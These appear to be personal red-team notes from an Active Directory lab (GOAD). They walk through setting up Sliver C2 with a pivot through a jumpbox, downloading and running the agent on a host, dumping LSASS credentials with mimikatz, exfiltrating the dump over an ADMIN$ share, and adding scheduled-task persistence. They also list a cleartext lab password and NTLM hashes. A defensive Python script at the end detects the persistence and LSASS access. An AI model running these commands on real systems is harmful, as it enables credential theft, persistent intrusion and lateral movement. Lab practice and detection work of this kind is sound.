## Parked Ideas

## Objectives

## `jeor.mormont`

- Is `Administrator` on [[castleblack]]
- We need to get remote shell access
- Use the remote shell to dump credentials on the DC, enabling further compromise
- Unable to gain a remote shell via WinRM
- Can execute commands using [[PsExec - TODO]]

### Setting up Sliver

- We'll be piping all our traffic through the jumpbox.
- i.e. our Sliver server will be behind the jumpbox.
- So how do the Sliver agents actually reach the Sliver server?
- One option is to create a TCP pivot agent and deploy it on the jumpbox, and have subsequent agents connect to that one.
- Alternatively we may be able to use the WireGuard agents somehow???
- Another option is to figure out how to leverage the jumpbox's WireGuard server to route the C2 traffic back to us.
- Set up a TCP listener on the jumpbox host; seems cleanest.
- Gen payload for the jumpbox (Linux); make sure to use the WireGuard network IP for the callback.
- Gen payload for [[castleblack]] (Windows), using `generate --tcp-pivot $INTERNAL_JUMPBOX_ADDRESS`.

**Generating the jumpbox agent**

```sh
generate --os linux --skip-symbols --http 10.13.13.2 --name jumpbox
```

**Transfer to jumpbox**

```sh
scp -i /root/GOAD/workspace/02a4df-goad-azure/ssh_keys/ubuntu-jumpbox.pem ./jumpbox [email protected]:/home/goad/agent
```

**Start agent on jumpbox:**

```sh
# on the jumpbox
./agent

# in the sliver console
tcp pivot
```

**Generate payload for [[castleblack]]**

```sh
generate --os windows --tcp-pivot 192.168.56.100:9898 --name castleblack --skip-symbols --debug
```

**Host the payload on the attacker machine:**

```sh
# start file server on the attacker machine
python -m http.server 8000

# redirect to internal port
socat TCP-LISTEN:8888,fork,reuseaddr TCP:127.0.0.1:8000
```

**Using RDP to gain a semi-interactive shell:**

```sh
xfreerdp /u:$USER /p:$PASS /d:north.sevenkingdoms.local /v:castleblack
```

**Downloading the agent payload:**

```powershell
# curl.exe rather than the PowerShell curl alias, whose -o is ambiguous (Invoke-WebRequest)
curl.exe http://192.168.56.100:8000/castleblack.exe -o C:\tmp\agent.exe
```

And finally execute the fokcer:

```powershell
# from the RDP session
C:\tmp\agent.exe
```

Let's drop mimikatz in there, run it, and prepare the output for exfil:

```powershell
# on castleblack, through the RDP PowerShell terminal
curl.exe http://192.168.56.100:8888/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "log sekurlsa.txt" "sekurlsa::logonpasswords" "exit"
mv sekurlsa.txt C:\Windows\Temp\sekurlsa.txt
```

Let's make our lives a little easier, for both tool infil and loot exfil, by mounting the [[SMB Share - ADMIN$]]:

```sh
sudo mount -t cifs //192.168.56.22/ADMIN$ /mnt/castleblack-admin \
  -o username=jeor.mormont,password=_L0ngCl@w_,domain=north.sevenkingdoms.local,vers=3.0
```

Let's exfil that down to our attacker machine:

```sh
mv /mnt/castleblack-admin/Temp/sekurlsa.txt ./
```

I'd also like to add some sort of persistence (hasn't been tested yet):

```powershell
schtasks /create /tn "Updater" /tr "C:\Users\jeor.mormont\agent.exe" /sc onlogon /rl highest /f
```

Well now we got creds n shit, but we're still missing the AD GPO layout etc.

- [[BloodHound]] would be very appropriate at this point...

The next logical steps here:

- Map out the AD GPO/setup using [[BloodHound]]
- Figure out how to move onto the DC
- Leverage NTLM hashes and crack passwords found in sekurlsa.txt
- Add persistence (backdoor user once we pop the DC)

## Sekurlsa output for lateral movement

- User: `sql_svc`, NTLM: `84a5092f53390ea48d660be52b93b804`
- User: `robb.stark`, NTLM: `831486ac7f26860c9e2f51ac91e1a07a`
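Two of the steps above leave host artefacts that a blue team on a lab like this should be able to catch: the `sekurlsa::logonpasswords` dump reads LSASS memory (Sysmon Event ID 10, ProcessAccess), and the `schtasks /create ... /sc onlogon /rl highest` persistence writes a Security 4698 (scheduled task created) event whose `TaskContent` field carries the task XML. The following triage script is an added example for this page, not part of the original notes or of any project they reference; the events are constructed dicts in a simplified Winlogbeat-style shape (field names `TaskName`, `TaskContent`, `SourceImage`, `TargetImage`, `GrantedAccess` follow the Windows event data, the records themselves are made up), and the "trusted path" and "user-writable path" lists are lab assumptions rather than a production allow-list.

```python
"""Triage Security 4698 task-creation and Sysmon 10 lsass-access events.
Constructed example; sample events below are made up to mirror the notes."""
import re
import xml.etree.ElementTree as ET

# Namespace used by the Task Scheduler XML embedded in the 4698 TaskContent field.
TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Assumption for this lab: a scheduled task launching from one of these
# locations is worth a look.  Tune to the environment in real use.
USER_WRITABLE = re.compile(r"^(C:\\Users\\|C:\\Windows\\Temp\\|C:\\Temp\\|C:\\tmp\\)", re.I)

# Assumption: images under these roots are treated as trusted lsass readers.
# Real rules exclude by signer/known process, not path alone.
TRUSTED_ROOTS = ("c:\\windows\\system32\\", "c:\\program files\\")

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory


def parse_task_xml(task_xml: str) -> dict:
    """Pull triggers, run level and Exec commands out of Task Scheduler XML."""
    root = ET.fromstring(task_xml)
    triggers_el = root.find(f"{TASK_NS}Triggers")
    triggers = [] if triggers_el is None else [c.tag.replace(TASK_NS, "") for c in triggers_el]
    run_level = root.findtext(f".//{TASK_NS}RunLevel") or ""
    commands = [c.text or "" for c in root.iter(f"{TASK_NS}Command")]
    return {"triggers": triggers, "run_level": run_level, "commands": commands}


def review_task_creation(event: dict) -> list:
    """Reasons a Security 4698 event deserves analyst attention (empty = benign)."""
    if event.get("EventID") != 4698:
        return []
    task = parse_task_xml(event["TaskContent"])
    reasons = []
    if "LogonTrigger" in task["triggers"] or "BootTrigger" in task["triggers"]:
        reasons.append("runs at logon/boot")
    if task["run_level"] == "HighestAvailable":
        reasons.append("requests highest privileges")
    for cmd in task["commands"]:
        if USER_WRITABLE.match(cmd):
            reasons.append(f"command in user-writable path: {cmd}")
    return reasons


def lsass_access_suspicious(event: dict) -> bool:
    """Sysmon EventID 10 where an untrusted image opens lsass with VM_READ."""
    if event.get("EventID") != 10:
        return False
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    source = event.get("SourceImage", "").lower()
    trusted = source.startswith(TRUSTED_ROOTS)
    return bool(granted & PROCESS_VM_READ) and not trusted


def triage(events) -> list:
    """Run both checks over a list of events and return human-readable findings."""
    findings = []
    for ev in events:
        reasons = review_task_creation(ev)
        if reasons:
            findings.append(
                f"4698 task {ev['TaskName']} by {ev.get('SubjectUserName')}: " + "; ".join(reasons)
            )
        if lsass_access_suspicious(ev):
            findings.append(
                f"Sysmon 10 lsass read by {ev['SourceImage']} (GrantedAccess {ev['GrantedAccess']})"
            )
    return findings


# Constructed sample events: one task like the persistence above, one built-in
# task, one lsass read from a tool dropped in C:\tmp, one from csrss.exe.
SAMPLE_EVENTS = [
    {"EventID": 4698, "SubjectUserName": "jeor.mormont", "TaskName": "\\Updater",
     "TaskContent": r'<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
                    r'<Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>'
                    r'<Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>'
                    r'<Actions Context="Author"><Exec><Command>C:\Users\jeor.mormont\agent.exe</Command></Exec></Actions>'
                    r'</Task>'},
    {"EventID": 4698, "SubjectUserName": "SYSTEM", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": r'<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
                    r'<Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>'
                    r'<Actions Context="Author"><Exec><Command>%windir%\system32\defrag.exe</Command></Exec></Actions>'
                    r'</Task>'},
    {"EventID": 10, "SourceImage": "C:\\tmp\\mimikatz.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": "C:\\Windows\\system32\\csrss.exe",
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1FFFFF"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The task check keys on three signals together (logon/boot trigger, `HighestAvailable`, command under a user-writable path) rather than any one of them, because legitimate software installs logon tasks all the time; the lsass check keys on the `PROCESS_VM_READ` bit rather than on the exact `0x1010` mask so that variations in requested access still surface. In a real environment, feed it records exported from EVTX or a SIEM instead of the constructed list.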